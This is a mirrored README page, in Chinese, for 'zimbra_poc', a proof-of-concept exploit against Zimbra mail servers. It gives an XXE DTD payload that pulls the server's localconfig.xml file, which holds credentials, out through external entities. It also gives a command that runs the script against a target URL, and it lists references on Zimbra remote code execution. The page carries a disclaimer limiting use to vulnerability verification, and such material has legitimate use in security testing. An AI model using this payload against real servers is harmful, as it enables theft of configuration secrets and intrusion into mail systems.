Code Monkey home page Code Monkey logo

zimbra_poc's Introduction

Zimbra POC

用法

  1. 需要自己在源代码中修改dtd_url为如下内容的dtd地址:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
  1. 使用方法:
python zimbra_poc.py https://target.com
  1. POC仅供验证漏洞使用,请勿用于非法用途。

参考资料

  1. 《A Saga of Code Executions on Zimbra》

  2. What Are XML External Entity (XXE) Attacks

  3. 漏洞预警 | Zimbra 远程代码执行漏洞

  4. CVE-2013-7091 EXP

  5. Zimbra Soap API

  6. 《A Saga of Code Executions on Zimbra》RCE漏洞分析+复现过程

zimbra_poc's People

Contributors

fnmsd avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.